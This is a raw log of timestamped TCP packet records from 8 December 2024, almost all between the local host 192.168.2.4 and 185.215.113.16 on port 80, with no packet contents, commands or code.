Dec 8, 2024 19:52:40.888449907 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.888494015 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.889170885 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.889233112 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.889266968 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.889307976 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.890031099 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.890091896 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.890113115 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.890156031 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.891016960 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.891071081 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.891114950 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.891251087 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.891866922 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.891916037 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.891977072 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.892020941 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.892739058 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.892812014 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.892841101 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.892877102 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.893578053 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.893748999 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.893811941 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.894531012 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.894598961 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.894659996 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.895611048 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.895664930 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.895725965 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.895768881 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.896385908 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.896425962 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.896470070 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.896514893 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.897108078 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.897151947 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.897207975 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.897249937 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.897979021 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.898073912 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.898121119 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.898905039 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.898979902 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.899029970 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.899069071 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.899791956 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.899913073 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.899972916 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.900687933 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.900763988 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.900777102 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.900830984 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.901546955 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.901595116 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.901762962 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.901808023 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.902431965 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.902475119 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.902553082 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.902597904 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.903420925 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.903477907 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.903507948 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.903650999 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.904203892 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.904247999 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.904323101 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.904371023 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.905082941 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.905210972 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.905478001 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.905667067 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.905991077 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.906089067 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.906169891 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.906240940 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.906938076 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.906989098 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.907075882 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.907125950 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.907733917 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.907869101 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.907936096 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.908610106 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.908673048 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.908778906 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.908828974 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.909919024 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.909969091 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.910013914 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.910062075 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.910828114 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.910876989 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.910907984 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.910947084 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.911705971 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.911772013 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.911801100 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.911854982 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.912616968 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.912669897 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.912686110 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.912733078 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.913224936 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.913275957 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.913280010 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.913320065 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.913934946 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.913996935 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.914030075 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.914068937 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.914840937 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.914997101 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.915056944 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.915713072 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.915772915 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.915779114 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.915817022 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.916693926 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.916743040 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.916774035 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.916815042 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.917490005 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.917543888 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.917613029 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.917718887 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.918385029 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.918495893 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.918520927 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.918539047 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.919416904 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.919467926 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.065370083 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.065470934 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.065474987 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.065524101 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.065754890 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.065812111 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.065861940 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.066626072 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.067142010 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.067212105 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.067231894 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.067275047 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.067897081 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.067948103 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.067986965 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.068032026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.068732977 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.068789959 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.068850040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.068902969 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.069632053 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.069683075 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.069713116 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.069756985 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.070631027 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.070674896 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.070681095 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.070717096 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.071449995 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.071499109 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.071521997 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.071564913 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.072316885 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.072369099 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.072371960 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.072411060 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.073225021 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.073273897 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.073308945 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.073354959 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.074048042 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.074095964 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.074131966 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.074177027 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.075020075 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.075093031 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.075129032 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.075174093 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.075838089 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.075908899 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.075927973 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.075973988 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.076776981 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.076831102 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.076860905 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.076904058 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.077573061 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.077622890 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.077775955 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.077822924 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.078478098 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.078531027 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.078583002 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.078630924 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.079408884 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.079459906 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.079588890 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.079637051 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.080574036 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.080626011 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.080801010 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.080851078 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.081530094 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.081573963 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.081578970 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.081593037 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:41.081623077 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.081644058 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:41.082323074 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.082376003 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.082549095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.082596064 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.083082914 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.083133936 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.083156109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.083204031 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.083914042 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.083971024 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.084001064 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.084048033 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.084707975 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.084757090 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.084811926 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.084851980 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.085581064 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.085654020 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.085683107 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.085724115 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.086446047 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.086504936 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.086534977 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.086576939 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.087333918 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.087385893 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.087500095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.087548018 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.088280916 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.088325977 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.088383913 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.088429928 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.089097977 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.089143038 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.089205027 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.089256048 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.090060949 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.090107918 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.090141058 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.090187073 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.090856075 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.090902090 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.090971947 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.091018915 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.091768980 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.091815948 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.091876030 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.091926098 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.092794895 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.092807055 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.092847109 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.093691111 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.093732119 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.093771935 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.093827009 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.094438076 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.094484091 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.094511032 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.094552040 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.095341921 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.095388889 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.095424891 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.095468998 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.096190929 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.096257925 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.096292973 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.096338034 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.097060919 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.097110033 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.097181082 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.097222090 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.097966909 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.098011971 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.098162889 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.098208904 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.099013090 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.099062920 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.099128962 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.099168062 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.099733114 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.099783897 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.099899054 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.099945068 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.101246119 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.101295948 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.101366043 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.101406097 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.101481915 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.101527929 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.101610899 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.101655960 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.102376938 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.102425098 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.102560997 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.102607012 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.103285074 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.103334904 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.103533983 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.103580952 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.104171038 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.104218006 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.104290962 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.104336023 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.105034113 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.105083942 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.105139017 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.105184078 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.106034040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.106081963 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.106111050 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.106153011 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.106822968 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.106893063 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.106919050 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.106961966 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.107884884 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.107932091 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.108030081 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.108079910 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.108576059 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.108624935 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.108710051 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.108752012 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.109477043 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.109535933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.109595060 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.109641075 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.110419989 CET	80	49757	185.215.113.16	192.168.2.4
